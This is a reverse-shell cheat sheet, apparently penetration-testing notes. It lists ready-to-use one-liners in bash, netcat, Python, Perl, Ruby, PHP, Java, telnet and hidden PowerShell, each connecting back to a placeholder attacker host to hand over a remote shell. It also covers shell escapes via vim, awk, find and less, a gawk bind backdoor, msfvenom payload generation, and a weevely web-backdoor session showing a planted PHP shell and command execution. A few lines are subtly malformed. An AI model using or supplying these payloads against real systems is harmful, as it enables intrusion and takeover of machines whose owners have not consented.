Reverse Shells

Shells¶

Upgrading simple shells to fully interactive TTYs¶

>>> msfvenom -l payloads | grep "cmd/unix"| awk '{print $1}'
>>> msfvenom -p cmd/unix/reverse_netcat LHOST=[IPADDR] LPORT=[PORT]

Bash¶

TEE¶

echo "evil script code" | tee script.sh

xterm¶

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1

You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip

VIM¶

Open vi or vim and type: :set shell=/bin/bash
Next, type and execute :shell or :! /bin/bash

AWK¶

awk 'BEGIN {system("/bin/sh")}'

GAWK¶

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

FIND¶

find / -name blahblah 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

MORE/LESS/MAN¶

After you use the 'more', 'less', or 'man' command with a file, type '!' followed by a command. For instance, try the following once inside the file:

'! /bin/sh'
'!/bin/sh'
'!bash'

Reverse Shell¶

bash -i >& /dev/tcp/[IPADDR]/[PORT] 0>&1

0<&196;exec 196<>/dev/tcp/[IPADDR]/[PORT]; sh <&196 >&196 2>&196

Perl¶

Shell¶

perl -e 'exec "/bin/sh";'

exec "/bin/sh";

Reverse Shell¶

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows Only

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby¶

Shell¶

exec "/bin/sh"

Reverse Shell¶

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("[IPADDR]",[PORT]).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows Only

ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat Reverse Shell¶

Linux:

nc -c /bin/sh [IPADDR] [PORT]
/bin/sh | nc [IPADDR] [PORT]
rm -f /tmp/p; mknod /tmp/p p && nc [IPADDR] [PORT] 0/tmp/p

Windows:

nc -nv 4444 -e cmd.exe
nc -nv {ip} {port} -e cmd.exe

Python¶

Shell¶

Reverse Shell¶

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IPADDR]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty; pty.spawn("/bin/bash")'

exit_code = os.system('/bin/sh');
output = os.popen('/bin/sh').read()

PHP¶

Shell¶

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

<?php
$output = shell_exec('ls ../../');
echo "<pre>$output</pre>";
?>

php-reverse-shell

Weevly3

root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py generate some_password /root/Desktop/backdoor.php
Generated backdoor with password 'some_password' in '/root/Desktop/backdoor.php' of 1332 byte size.
#upload the shell (somewhere accessible)
#access the URL where the backdoor is located(http://192.168.230.150:8081/images/shells/backdoor.php)
#then execute

root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py http://192.168.230.150:8081/images/shells/backdoor.php some_password

[+] weevely 3.2.0

[+] Target:     192.168.230.150:8081
[+] Session:    /root/.weevely/sessions/192.168.230.150/backdoor_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> whoami
www-data

Reverse Shell¶

php -r '$sock=fsockopen("[IPADDR]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

Telnet Reverse Shell¶

rm -f /tmp/p; mknod /tmp/p p && telnet [IPADDR] [PORT] 0/tmp/p

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

Java¶

Shell¶

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Netcat¶

nc -e /bin/sh 10.0.0.1 1234

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

nc -c /bin/sh attackerip 4444

/bin/sh | nc attackerip 4444

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Powershell¶

Reverse Shell¶

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()